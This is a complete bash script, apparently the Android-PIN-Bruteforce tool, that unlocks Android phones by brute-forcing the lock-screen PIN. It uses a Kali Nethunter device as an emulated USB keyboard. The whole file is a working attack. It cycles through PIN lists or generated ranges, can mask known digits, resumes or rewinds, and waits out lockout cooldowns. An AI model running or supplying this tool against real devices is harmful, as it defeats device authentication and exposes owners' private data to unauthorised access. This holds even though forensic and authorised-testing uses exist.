android-pin-bruteforce

1. #!/bin/bash
2. # Android-PIN-Bruteforce
3. # Unlock an Android phone (or device) by bruteforcing the lockscreen PIN.
4. # Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices!
5. # This uses the USB OTG cable to emulate a keyboard, automatically try PINs, and wait after trying too many wrong guesses.
6. # https://github.com/utsanjan/Android-Pin-Bruteforce/
7. #
8. # Load Default Configuration
9. source config.default
10. # Load Configuration
11. source config
12.  
13.  
14. VERSION=0.1
15.  
16. # Operating System Environment
17. KEYBOARD_DEVICE=/dev/hidg0
18. HID_KEYBOARD=/system/xbin/hid-keyboard
19. USB_DEVICES=/usr/bin/usb-devices
20.  
21. DIRECTION=1 # go forwards
22. #RET=0
23.  
24. LIGHT_GREEN="\033[92m"
25. LIGHT_YELLOW="\033[93m"
26. LIGHT_RED="\033[91m"
27. LIGHT_BLUE="\033[94m"
28. DEFAULT="\033[39m"
29. CLEAR_LINE="\033[1K"
30. MOVE_CURSOR_LEFT="\033[80D"
31.  
32. function usage() {
33.   echo -e "
34. Android-PIN-Bruteforce is used to unlock an Android phone (or device) by bruteforcing the lockscreen PIN.
35.  
36.  Find more information at: https://github.com/utsanjan/Android-Pin-Bruteforce/
37.  
38. Commands:
39.  crack\t\t\tBegin cracking PINs
40.  resume\t\tResume from a chosen PIN
41.  rewind\t\tCrack PINs in reverse from a chosen PIN
42.  diag\t\t\tDisplay diagnostic information
43.  
44. Options:
45.  -f, --from PIN\tResume from this PIN
46.  -m, --mask REGEX\tUse a mask for known digits in the PIN
47.  -t, --type TYPE\tSelect PIN or PATTERN cracking
48.  -l, --length NUM\tCrack PINs of NUM length
49.  -d, --dry-run\t\tDry run for testing. Doesn't send any keys.
50.  -v, --verbose\t\tOutput verbose logs.
51.  
52. Usage:
53.  android-pin-bruteforce <command> [options]
54.  
55. "
56.  
57. }
58.  
59.  
60. function load_pinlist() {
61.   length=$1
62.  
63.   top_number=$((10**$length-1))
64.  
65.   # Only load from file if it's 4 digits
66.   if [ $length -eq 4 ]; then
67.     pinlist=(`cat $PIN_LIST`)
68.   else
69.     # generate the list
70.     pinlist=(`seq -w 0 $top_number`)
71.   fi
72.  
73.   if [ -n "$MASK" ]; then
74.     pinlist=(`echo "${pinlist[@]}" | tr ' ' '\n' | egrep "$MASK" | tr '\n' ' '`)
75.   fi
76.  
77.   # validate mask returned PINs
78.   if [ ${#pinlist[@]} -eq 0 ]; then
79.     log_fail "MASK $MASK created an invalid PIN list with zero PINs"
80.     abort
81.   fi
82.  
83.   resume_from_index=0
84.   if [ -n "$RESUME_FROM_PIN" ]; then
85.  #   log_debug "Looking for $RESUME_FROM_PIN in pinlist"
86.     for i in "${!pinlist[@]}"; do
87.        if [[ "${pinlist[$i]}" = "${RESUME_FROM_PIN}" ]]; then
88.   #         log_debug  "Found ${RESUME_FROM_PIN} at element ${i}"
89.           resume_from_index=$i
90.        fi
91.     done
92.   fi
93. }
94.  
95.  
96. function repeat(){
97.   printf "%0.s$1" $(eval echo {1..$2})
98. }
99.  
100.  
101. # progress bar
102. # https://unix.stackexchange.com/questions/415421/linux-how-to-create-simple-progress-bar-in-bash
103. function prog() {
104.     tput cup 0 0
105.     local w=80 p=$1
106.     shift
107.     # create a string of spaces, then change them to dots
108.     printf -v dots "%*s" "$(( $p*$w/100 ))" ""
109.     dots=${dots// /x}
110.     # print those dots on a fixed-width space plus the percentage etc.
111.     printf "\r\e[K|%-*s| %3d %% %s" "$w" "$dots" "$p" "$*"
112. }
113.  
114.  
115. function diagnostic_info() {
116.   log_info "Diagnostic info"
117.  
118.   if [ -e $KEYBOARD_DEVICE ]; then
119.     log_pass "HID device ($KEYBOARD_DEVICE) found"
120.     ls -l $KEYBOARD_DEVICE
121.   else
122.     log_fail "HID device ($KEYBOARD_DEVICE) not found"
123.   fi
124.  
125.   if [ -f $HID_KEYBOARD ]; then
126.     log_pass "hid-keyboard executable ($HID_KEYBOARD) found"
127.     ls -l $HID_KEYBOARD
128.   else
129.     log_fail "hid-keyboard executable ($HID_KEYBOARD) not found"  
130.   fi
131.  
132.   if [ -f $USB_DEVICES ]; then
133.     log_pass "usb-devices executable ($USB_DEVICES) found"
134.     ls -l $USB_DEVICES
135.   else
136.     log_fail "usb-devices executable ($USB_DEVICES) not found"  
137.   fi
138.  
139.   log_info "Executing Command: $USB_DEVICES"
140.   $USB_DEVICES
141.   RET=$?
142.   if [ $RET -eq 0 ]; then
143.     log_pass "usb-devices script executed succeessfully."
144.   else
145.     log_fail "usb-devices script failed. Return code $RET."
146.   fi
147.  
148.   log_info "Finding Android Phone USB Device"
149.   devices=$($USB_DEVICES | egrep -C 5 "Manufacturer=[^L][^i][^n][^u][^x]" \
150.  | egrep "Vendor|Manufacturer|Product|SerialNumber" | cut -c 5- )
151.  
152.   if [ -n "$devices" ]; then
153.     log_pass "Device identified: $devices"
154.   else
155.     log_fail "Device not found"
156.   fi
157.  
158.   log_info "Sending Enter Key"
159.   echo enter | $HID_KEYBOARD $KEYBOARD_DEVICE keyboard
160.   RET=$?
161.  
162.   if [ $RET -eq 0 ]; then
163.     log_pass "Key was sent succeessfully."
164.   else
165.     log_fail "Key failed to send. Return code $RET."
166.   fi
167.  
168.   log_info "Executing Command: /system/bin/getprop |grep usb"
169.   /system/bin/getprop |grep usb
170.   RET=$?
171.   echo  
172.  
173.   log_info "Executing Command: dmesg | grep -i usb | tail"
174.   dmesg | grep -i usb | tail
175.   echo  
176.  
177.   log_info "Troubleshooting tips"
178.   echo "- Nethunter HID support can be a PITA."
179.   echo "- Try powering off the phone and taking out the battery"
180.   echo "- Try /system/bin/setprop sys.usb.config hid"
181.   echo "- Try it on your PC or laptop"
182.   echo
183.   exit
184. }
185.  
186. function discover_device() {
187.  if [ $DRY_RUN -eq 0 ]; then
188.     # accepts any USB device manufacturer except Linux
189.     devices=$(usb-devices | egrep -C 5 "Manufacturer=[^L][^i][^n][^u][^x]" \
190.  | egrep "Vendor|Manufacturer|Product|SerialNumber" | cut -c 5- )
191.  else
192.     devices="Manufacturer: Dry-run Dummy Android Device"
193.  fi
194.  
195.  if [ -n "$devices" ]; then
196.    log_pass "Device identified: $devices"
197.  fi
198. }
199.  
200. # Show configuration
201. function show_configuration() {
202.   log_conf "PIN list: $PIN_LIST"
203.   log_conf "Delay between keystrokes: $DELAY_BETWEEN_KEYS"
204.   log_conf "HID Keyboard device: $KEYBOARD_DEVICE"
205.   log_conf "Log file: $LOG"
206.   log_conf "Mask: $MASK"
207.   log_conf "Resume from: $RESUME_FROM_PIN"
208.   log_conf "PIN Type (PIN or Pattern): $PIN_TYPE"
209.   log_conf "PIN Length: $PIN_LENGTH"
210.  
211. }
212.  
213. function abort() {
214.   if [ $DRY_RUN -eq 0 ]; then
215.     exit 1
216.   else
217.     # continue
218.     echo Dry Run Continues
219.   fi
220. }
221.  
222. function send_enter() {
223.   send_key enter
224. }
225.  
226. function send_esc() {
227.   send_key esc
228. }
229.  
230. function send_key(){
231.  
232.   if [ $DRY_RUN -eq 0 ]; then
233.     echo $1 | $HID_KEYBOARD $KEYBOARD_DEVICE keyboard 2>/dev/null
234.     RET=$?
235.     sleep $DELAY_BETWEEN_KEYS
236.   else
237.     RET=0 # as if it succeeded
238.     sleep $DELAY_BETWEEN_KEYS
239.   fi
240. }
241.  
242.  
243. function log_info(){
244.   echo -e "[${LIGHT_BLUE}INFO${DEFAULT}] $1" | tee -a $LOG
245. }
246.  
247. function log_pass(){
248.   echo -e "[${LIGHT_GREEN}PASS${DEFAULT}] $1" | tee -a $LOG
249. }
250.  
251. function log_fail(){
252.   echo -e "[${LIGHT_RED}FAIL${DEFAULT}] $1" | tee -a $LOG
253. }
254.  
255. function log_conf(){
256.   echo -e "[${LIGHT_YELLOW}CONF${DEFAULT}] $1" | tee -a $LOG
257. }
258.  
259.  
260. function log_debug(){
261.   if [ $VERBOSE -gt 0 ]; then
262.     echo -e "[${LIGHT_YELLOW}DEBUG${DEFAULT}] $1" | tee -a $LOG
263.   fi
264. }
265.  
266.  
267. function monitor_phone_connection(){
268.   # check connection to phone
269.   # RET is set by the send_key/send_enter function
270.   fail_counter=0
271.   while [ $RET != 0 ]; do
272.     log_fail "HID USB device not ready. $HID_KEYBOARD returned $RET."
273.     sleep 2
274.     send_enter
275.     ((fail_counter++))
276.  
277.     if [[ $fail_counter -gt $EXIT_AFTER_FAIL_COUNT ]]; then
278.       log_fail "Exiting after $EXIT_AFTER_FAIL_COUNT successive failures."
279.       abort
280.     fi
281.   done
282. }
283.  
284.  
285. function check_environment(){
286.   if [ -e $KEYBOARD_DEVICE ]; then
287.     log_pass "HID device ($KEYBOARD_DEVICE) found"
288.   else
289.     log_fail "HID device ($KEYBOARD_DEVICE) not found"
290.     abort
291.   fi
292.  
293.   if [ -f $HID_KEYBOARD ]; then
294.     log_pass "hid-keyboard executable ($HID_KEYBOARD) found"
295.   else
296.     log_fail "hid-keyboard executable ($HID_KEYBOARD) not found"
297.     abort  
298.   fi
299.  
300.   if [ -f $USB_DEVICES ]; then
301.     log_pass "usb-devices executable ($USB_DEVICES) found"
302.   else
303.     log_fail "usb-devices executable ($USB_DEVICES) not found"
304.     abort  
305.   fi
306. }
307.  
308.  
309.  
310. # Commandline option handling inspired by ./configure
311.  
312. ac_prev=
313. for ac_option
314. do
315.   # If the previous option needs an argument, assign it.
316.   if test -n "$ac_prev"; then
317.     eval "$ac_prev=\$ac_option"
318.     ac_prev=
319.     continue
320.   fi
321.  
322.   case "$ac_option" in
323.   -*=*) ac_optarg=`echo "$ac_option" | sed 's/[-_a-zA-Z0-9]*=//'` ;;
324.   *) ac_optarg= ;;
325.   esac
326.  
327.   case "$ac_option" in
328.  
329.   -from | -f | --from)
330.     ac_prev=from ;;
331.  
332.   -from=* | -f=* | --from=*)
333.     from="$ac_optarg" ;;
334.  
335.   -length=* | -l=* | --length=*)
336.     length="$ac_optarg" ;;
337.  
338.   -length | -l | --length)
339.     ac_prev=length ;;
340.  
341.   -mask | -m | --mask)
342.     ac_prev=mask ;;
343.  
344.   -mask=* | -m=* | --mask=*)
345.     mask="$ac_optarg" ;;
346.  
347.   -type=* | -t=* | --type=*)
348.     type="$ac_optarg" ;;
349.  
350.   -type | -t | --type)
351.     ac_prev=type ;;
352.  
353.   -verbose | -v | --verbose)
354.     VERBOSE=1 ;;
355.  
356.   -help | -h | --help)
357.     usage
358.     exit 1 ;;
359.  
360.   -dryrun | -d | --dryrun | -dry-run | --dry-run )
361.     DRY_RUN=1 ;;
362.  
363.   diag*)
364.     diagnostic_info
365.     exit ;;
366.  
367.   crack)
368.     ACTION=crack ;;
369.  
370.   resume)
371.     ACTION=resume ;;
372.  
373.   rewind)
374.     ACTION=rewind
375.     DIRECTION=-1 ;;
376.  
377.   -*) { echo "Error: $ac_option: invalid option; use --help to show usage" 1>&2; exit 1; }
378.     ;;
379.  
380.   *)
381.     if test "x$nonopt" != xNONE; then
382.       { echo "Error: invalid options" 1>&2; exit 1; }
383.     fi
384.     nonopt="$ac_option"
385.     ;;
386.  
387.   esac
388. done
389.  
390. if test -n "$ac_prev"; then
391.   { echo "configure: error: missing argument to --`echo $ac_prev | sed 's/_/-/g'`" 1>&2; exit 1; }
392. fi
393.  
394. # only set VARS if specified in commandline arguments
395. if [[ -n "$mask" ]]; then
396.   MASK=$mask
397. fi
398. if [[ -n "$from" ]]; then
399.   RESUME_FROM_PIN=$from
400. fi
401. if [[ -n "$type" ]]; then
402.   PIN_TYPE=$type
403. fi
404. if [[ -n "$length" ]]; then
405.   PIN_LENGTH=$length
406. fi
407.  
408. # Validation
409.  
410. # Validate PIN TYPE
411. case "$PIN_TYPE" in
412.   pattern | PATTERN )
413.     log_fail "Pattern cracking is not yet implemented."
414.     abort ;;
415.   pin | PIN )
416.     ;;
417.   *)
418.     log_fail "Type $PIN_TYPE cracking is not available."
419.     abort ;;
420. esac
421.  
422. # Validate PIN LENGTH
423. if [[ "$PIN_LENGTH" > 0 ]] && [[ "$PIN_LENGTH" < 9 ]]; then
424.   # nothing
425.   echo -n
426. else
427.   log_fail "PIN length is invalid. Valid lengths are 1 to 9."
428. fi
429.  
430. # rewind, resume require that RESUME_FROM_PIN be set
431. if [[ "$ACTION" = "resume" ]] || [[ "$ACTION" = "rewind" ]] && [[ -z "$RESUME_FROM_PIN" ]]; then
432.   log_fail "$ACTION requires that --from be set"
433.   exit 1
434. fi
435.  
436. if [ -z "$1" ]; then
437.   usage
438.   exit 1
439. fi
440.  
441.  
442. echo "Android PIN brute-force :: version $VERSION" | tee -a $LOG
443.  
444. if [[ $DRY_RUN -eq 1 ]]; then
445.   log_info "Dry run enabled"
446. fi
447.  
448. if [[ $VERBOSE > 0 ]]; then
449.   log_info "Current Configuration"
450.   show_configuration
451. fi
452.  
453. # Check Environment
454. log_info "Checking environment"
455. check_environment
456.  
457. # Find Android phone over USB cable
458. log_info "Identifying Android Phone"
459. discover_device
460.  
461. send_enter
462. sleep 1
463. send_enter
464. sleep 1
465.  
466.  
467.  
468. load_pinlist $PIN_LENGTH
469. position=$resume_from_index
470. pinlist_n_elements=${#pinlist[@]}
471.  
472. for (( position=$resume_from_index ; position>=0 && position <= pinlist_n_elements; position=position+DIRECTION ))
473. do
474.   ((count++))
475.   pin=${pinlist[position]}
476.  
477.   # hit escape and enter before every PIN attempted
478.   send_esc
479.   send_enter
480.  
481.   # if we got an error from sending the key, check the phone connection
482.   if [ $RET -gt 0 ]; then
483.     monitor_phone_connection
484.   fi
485.  
486.   percent_complete=$((100*$position/$pinlist_n_elements))
487.   echo "[SEND] $pin. Attempt $count ($percent_complete%) at $(date +"%b%d %r")" | tee -a "$LOG"
488. #  prog $percent_complete
489.  
490.   for i in `echo "$pin" | grep -o .`; do
491.     send_key $i
492.   done
493.   send_enter
494.  
495.   # COOLDOWN_TIME is optional
496.   if [[ $COOLDOWN_TIME > 0 && $COOLDOWN_AFTER_N_ATTEMPTS > 0 ]]; then
497.     # if we are after N attempts
498.     if [ $((count % $COOLDOWN_AFTER_N_ATTEMPTS)) = 0 ]; then
499.       # countdown COOLDOWN_TIME seconds
500.       for (( countdown=$COOLDOWN_TIME; countdown > 0; countdown-- ))
501.       do
502.         echo -ne "$CLEAR_LINE$MOVE_CURSOR_LEFT" # clear line and move cursor left
503.         echo -ne "[${LIGHT_YELLOW}WAIT${DEFAULT}] "
504.         echo -ne "$countdown"
505.         if [ $(($countdown%5)) = 0 ]; then
506.           send_enter
507.         fi
508.         sleep 1
509.       done
510.       echo -ne "$CLEAR_LINE$MOVE_CURSOR_LEFT"
511.     fi
512.   fi
513. done
514.  
515. log_info "End of PIN list reached"
516.